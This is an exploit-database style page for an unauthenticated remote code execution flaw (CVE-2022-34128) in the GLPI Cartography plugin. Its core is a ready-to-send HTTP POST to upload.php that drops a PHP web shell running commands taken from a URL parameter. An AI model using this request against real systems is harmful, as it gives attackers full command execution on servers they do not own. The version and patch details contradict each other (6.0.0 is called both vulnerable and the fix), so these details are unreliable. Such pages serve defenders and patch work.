GLPI Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)

vendor:

GLPI Cartography Plugin

by:

Nuri Çilengir

9.8

CVSS

CRITICAL

Unauthenticated Remote Code Execution (RCE)

CWE

Product Name: GLPI Cartography Plugin

Affected Version From: GLPI Cartography < 6.0.0

Affected Version To: GLPI Cartography 6.0.0

Patch Exists: NO

Related CWE: CVE-2022-34128

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu 22.04

2022

GLPI Cartography Plugin v6.0.0 – Unauthenticated Remote Code Execution (RCE)

The GLPI Cartography Plugin version 6.0.0 is vulnerable to unauthenticated remote code execution. By sending a specially crafted HTTP POST request to the 'upload.php' file, an attacker can execute arbitrary code on the target system. This vulnerability has been assigned CVE-2022-34128.

Mitigation:

Update GLPI Cartography Plugin to version 6.0.0 or higher.

Source

Exploit-DB raw data:

# Exploit Title: GLPI  Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)
# Date of found: 11 Jun 2022
# Application: GLPI Cartography < 6.0.0
# Author: Nuri Çilengir 
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/InfotelGLPI/positions
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE: CVE-2022-34128

# PoC
POST /marketplace/positions/front/upload.php?name=poc.php HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 39
Origin: http://192.168.56.113
Connection: close

<?php echo system($_GET["cmd"]); ?>